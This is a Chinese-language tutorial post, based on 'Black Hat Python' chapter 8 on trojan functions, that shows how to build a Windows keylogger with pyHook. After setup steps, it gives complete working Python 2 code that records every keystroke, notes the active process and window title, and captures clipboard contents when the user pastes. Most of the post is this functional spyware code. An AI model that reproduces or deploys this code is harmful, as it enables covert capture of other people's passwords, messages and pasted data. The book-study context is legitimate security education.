使用pyHook创建一个键盘记录器。
参考书籍

《Python黑帽子》---- 第八章 "Windows下木马的常用功能"

pyhack.jpg

安装pyHook

使用canda新建环境

conda create -n hooktest python=2.7
conda env list //列出环境，查看是否创建成功
activate hooktest //激活环境
//退出环境 deactivate

直接使用pip install是不成功的，可以下载离线WHL文件，再使用pip进行安装。

下载地址：https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook

我的电脑是64位，大家下载对应版本即可。

pyhookwhl.png

使用pip安装

pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl

测试安装成功

pyhook.png

同时，常和pyHook一起出现的还有pythoncom，同理安装pywin32即可。

pywin32.png

建议大家还是使用这种方式安装，网上说的下载exe可视化安装的方式不太好，容易搞乱自己常用的Python环境。

测试代码

# -*- coding: utf-8 -*-
import pythoncom
import pyHook
def onKeyboardEvent(event):
    # 监听键盘事件
    print "Key:", event.Key
def main():
    # 创建一个“钩子”管理对象
    hm = pyHook.HookManager()
    # 监听所有键盘事件
    hm.KeyDown = onKeyboardEvent
    # 设置键盘“钩子”
    hm.HookKeyboard()
    # 进入循环，如不手动关闭，程序将一直处于监听状态
    pythoncom.PumpMessages()
 
 
if __name__ == "__main__":
    main()

使用效果

pyhook_test1.png

加入窗口和进程检测

#-*- coding: utf-8 -*-
 
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
 
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
 
 
def get_current_process():
    # 获得窗口句柄
    hwnd = user32.GetForegroundWindow()
 
    # 获得进程ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
 
    # 保存当前进程ID
    process_id = "%d" % pid.value
    print process_id
 
    # 申请内存
    executable = create_string_buffer("\x00" * 512)
 
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
 
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
 
    # 读取窗口标题
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
 
    # 输出
    print "\n [ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
 
    # 关闭句柄
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)
 
 
def KeyStroke(event):
 
    global current_window
 
    # 检查目标是否切换窗口
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()
 
    # 检测按键是否为常规键
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
 
    else:
        # 如果输入为ctrl-v 则获取剪贴板内容
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
 
            print "[PASTE] - %s" % (pasted_value),
 
        else:
            print "[%s]" % event.Key,
 
    return True
 
# 创建和注册钩子函数管理器
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
 
 
# 注册键盘记录的钩子并永久执行
kl.HookKeyboard()
pythoncom.PumpMessages()

运行结果

5tong.png